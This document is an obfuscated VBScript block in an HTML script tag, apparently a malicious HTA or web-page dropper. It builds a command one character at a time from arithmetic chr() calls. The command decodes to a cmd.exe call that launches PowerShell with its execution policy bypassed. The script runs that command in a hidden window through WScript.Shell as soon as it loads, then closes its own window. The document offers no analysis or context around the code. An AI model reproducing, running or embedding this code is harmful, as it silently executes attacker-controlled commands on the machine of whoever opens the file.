<SCRIPT LANGUAGE="VBScript">
sub KGYQubPB()

NtWnjAkx = chr(48+48+3) & chr(52.5+52.5+4) &chr(45.5+45.5+9) &chr(26.5+26.5-7) & chr(52.5+52.5-4) &chr(64.5+64.5-9) & chr(51.5+51.5-2) & chr(19.5+19.5-7) & chr(27.5+27.5-8)& chr(49.5+49.5+0)& chr(20.5+20.5-9) &chr(58+58-4) &chr(56.5+56.5-2)& chr(57.5+57.5+4) &chr(47+47+7) & chr(53.5+53.5+7) & chr(57.5+57.5+0)
qMlWh = chr(55.5+55.5-7)& chr(46+46+9) & chr(53.5+53.5+1) &chr(58.5+58.5-9)& chr(26+26-6)& chr(48.5+48.5+4) & chr(61+61-2)& chr(53+53-5) &chr(13+13+6) &chr(24.5+24.5-4) & chr(52+52-3) &chr(57.5+57.5-3)& chr(19+19-6) & chr(47.5+47.5+3) & chr(61+61-1)& chr(56+56+0) &chr(45.5+45.5+6)& chr(59+59-3) &chr(60+60-5)
aHlk = chr(12.5+12.5+7)& chr(24+24-3) &chr(53+53+4) & chr(58+58-5) & chr(57.5+57.5-5) &chr(54.5+54.5-4) & chr(17+17-2) & chr(18+18+9)& chr(55+55+9) & chr(19+19-6)& chr(55.5+55.5-7)& chr(56.5+56.5-8) & chr(50+50+0)
JOLLZxbkf = chr(46.5+46.5+7) &chr(50+50+1) & chr(55+55+0)

eCALHwJXzxi = chr(17+17-2) &chr(18.5+18.5+8)& chr(48+48+5) &chr(53+53+4) &chr(51+51-3)& chr(15.5+15.5+1) & chr(33.5+33.5+8) & chr(36.5+36.5-8)

zakaBjbTnvF = chr(31.5+31.5+3) & chr(42+42-5) & chr(29+29+7) &chr(33+33+5) &chr(43.5+43.5-2) & chr(29.5+29.5+6) & chr(51.5+51.5-3) & chr(57+57+5) & chr(31+31+3)

gOSBdb = chr(58+58-0) & chr(30+30+5) & chr(32.5+32.5+4)& chr(30.5+30.5-5) &chr(28.5+28.5+8)& chr(45+45-1) &chr(51+51+1)& chr(36.5+36.5-7)& chr(58+58-3) & chr(29.5+29.5+6) &chr(33+33+5) &chr(43+43-1) & chr(34.5+34.5-4) & chr(40.5+40.5+8) & chr(62.5+62.5-6) &chr(33+33-0) & chr(26.5+26.5-5) & chr(36.5+36.5-8) & chr(30.5+30.5+6)& chr(32+32+1)& chr(31+31+3)& chr(46+46-7) &chr(55.5+55.5+8) & chr(33+33-0)& chr(29.5+29.5-6) &chr(28+28+9) &chr(40.5+40.5-9) &chr(34.5+34.5+8)& chr(30.5+30.5+4) &chr(47+47+6)& chr(30.5+30.5+4)& chr(32.5+32.5+1)& chr(58.5+58.5-9) &chr(32.5+32.5+0) & chr(35+35+1) & chr(23.5+23.5+1) &chr(29.5+29.5+6) & chr(38+38+0) &chr(50+50+3) &chr(37.5+37.5-9) &chr(35.5+35.5+8) & chr(32+32+1) &chr(35.5+35.5+0) &chr(39.5+39.5+6)

mYCnpk = chr(28+28+9) &chr(47+47+6) &chr(30+30+5)& chr(35+35-5) & chr(58.5+58.5+0) &chr(30+30+5)

hLvsmyf = chr(32+32+6)& chr(46.5+46.5+6) &chr(33+33-1)& chr(41.5+41.5+7)
DIbTu = chr(40.5+40.5+0) & chr(31.5+31.5+3) & chr(49+49+7) &chr(33+33-1) &chr(37.5+37.5-6) & chr(38+38+1)& chr(34.5+34.5-4)& chr(45+45+8)& chr(30.5+30.5+4)& chr(37+37-8) & chr(58+58-4) & chr(29+29+7)& chr(38.5+38.5-6) &chr(39.5+39.5+6) & chr(32+32+1) &chr(51.5+51.5-5) &chr(54+54-5) & chr(29+29+8)& chr(26.5+26.5-5) & chr(35+35-5)& chr(32+32+3) &chr(51+51+5)
QGTGtvSkC = chr(29+29+7) &chr(38+38-0) &chr(47+47+9) &chr(36+36-6) &chr(35.5+35.5-2) &chr(32.5+32.5+0) &chr(35.5+35.5+0) &chr(24+24+8) & chr(33.5+33.5-2) & chr(45.5+45.5+9) & chr(62.5+62.5-6) & chr(37.5+37.5-9) & chr(58.5+58.5-0)& chr(28+28+9)& chr(38+38-5) & chr(64+64-9) &chr(33.5+33.5-2)& chr(48.5+48.5+1) & chr(61.5+61.5-4) &chr(28.5+28.5+9) &chr(52+52+0)& chr(32.5+32.5-0)& chr(39.5+39.5-8)& chr(39+39+3) & chr(35+35-5) &chr(45+45-8) & chr(49+49+5)& chr(29+29+8)& chr(56+56+0) & chr(36.5+36.5-8)& chr(33+33+5)& chr(61.5+61.5-4) &chr(29.5+29.5+6)& chr(45+45-0)& chr(38.5+38.5+4) &chr(30.5+30.5+4) &chr(56.5+56.5-2) &chr(28+28+9) & chr(34.5+34.5-2) &chr(50+50-1)& chr(32.5+32.5-0) &chr(33+33+8)& chr(55+55+9)& chr(32+32+1) & chr(57.5+57.5+0) &chr(37+37-9) & chr(33.5+33.5-0) & chr(50.5+50.5-2) & chr(32.5+32.5+0) & chr(45+45+0) & chr(48.5+48.5+6) &chr(36+36-6) & chr(53.5+53.5+8) & chr(36+36-7)
OiLJlsbmGOi = chr(37.5+37.5-4) &chr(42+42+1)& chr(34+34-3) & chr(43.5+43.5+3)
eTjQngocmE = chr(44+44-7)& chr(33.5+33.5-1) & chr(53+53-1)

IHiP = chr(28+28+9) & chr(33.5+33.5+4)
nYjA = chr(55+55+9) &chr(28+28+9)& chr(49+49-8)& chr(38.5+38.5+4) & chr(37+37-9)& chr(60+60-3)& chr(33.5+33.5-2) &chr(35+35+1) & chr(47+47-9) & chr(36+36-7)& chr(55+55-9)& chr(36.5+36.5-8) &chr(31+31+4)& chr(55.5+55.5-3)& chr(33+33-1) &chr(33+33+1) & chr(50.5+50.5-2)& chr(32.5+32.5+0) & chr(40.5+40.5-6)& chr(45+45-9) &chr(32.5+32.5-0) &chr(27.5+27.5-0) &chr(34+34-3)
ChlJS = chr(35+35-0) &chr(37+37+3)& chr(29.5+29.5+6) & chr(47.5+47.5+5) & chr(30+30+5)

EJdnWwy = chr(33+33-0) & chr(51.5+51.5+1) &chr(29.5+29.5+6)
kNrWYSlw = chr(40.5+40.5-9) &chr(36.5+36.5+0) &chr(32+32+1)& chr(49.5+49.5+1)& chr(36.5+36.5-8)

kSQFGJXOIU = chr(32.5+32.5+0) & chr(61+61-6) &chr(28+28+9)& chr(35+35+0)& chr(30+30+5)& chr(29.5+29.5+6)& chr(48.5+48.5+2) &chr(54+54-5)& chr(30.5+30.5+5) & chr(55+55+8)& chr(29.5+29.5+6)& chr(32.5+32.5+6)& chr(42.5+42.5-8) & chr(30.5+30.5+4) & chr(47.5+47.5-5) & chr(39.5+39.5+2)& chr(36.5+36.5-7) & chr(59.5+59.5+3)
BfumTPgqXIH = chr(28.5+28.5+8) &chr(33.5+33.5+5) & chr(39.5+39.5-2) & chr(32.5+32.5+0)& chr(41+41-9) & chr(36.5+36.5-8) &chr(35+35-5) &chr(58+58-6) &chr(35+35-5) & chr(35.5+35.5-0) & chr(44+44+1)& chr(34+34-3) & chr(47+47+4)& chr(31+31+3) &chr(32+32+2) &chr(51.5+51.5+5)& chr(33.5+33.5-2) &chr(32+32+7) &chr(41.5+41.5+2)& chr(33+33-1)& chr(48.5+48.5-8)& chr(48.5+48.5+6)& chr(33+33-0)& chr(59+59-3) &chr(30+30+5) & chr(31.5+31.5+8) & chr(44.5+44.5-4)

MLaIOiVQQ = chr(30.5+30.5+4) & chr(41+41-6) &chr(53.5+53.5-4) &chr(33+33+0)& chr(50.5+50.5+7) & chr(34.5+34.5-4) &chr(36+36-0)& chr(52.5+52.5-2) & chr(28.5+28.5+8)& chr(42.5+42.5+5) &chr(42+42-3) & chr(30+30+5)

Cwjs = chr(51+51+8) &chr(33.5+33.5-2)& chr(37+37-9) & chr(26+26+9) & chr(35+35-9)
fWoDj = NtWnjAkx + qMlWh + aHlk + JOLLZxbkf + eCALHwJXzxi + zakaBjbTnvF + gOSBdb + mYCnpk + hLvsmyf + DIbTu + QGTGtvSkC + OiLJlsbmGOi + eTjQngocmE + IHiP + nYjA + ChlJS + EJdnWwy + kNrWYSlw + kSQFGJXOIU + BfumTPgqXIH + MLaIOiVQQ + Cwjs
set wyyJI = CreateObject("Wscript.Shell")

wyyJI.run fWoDj, 0, false
window.close()

end sub
KGYQubPB
</SCRIPT>

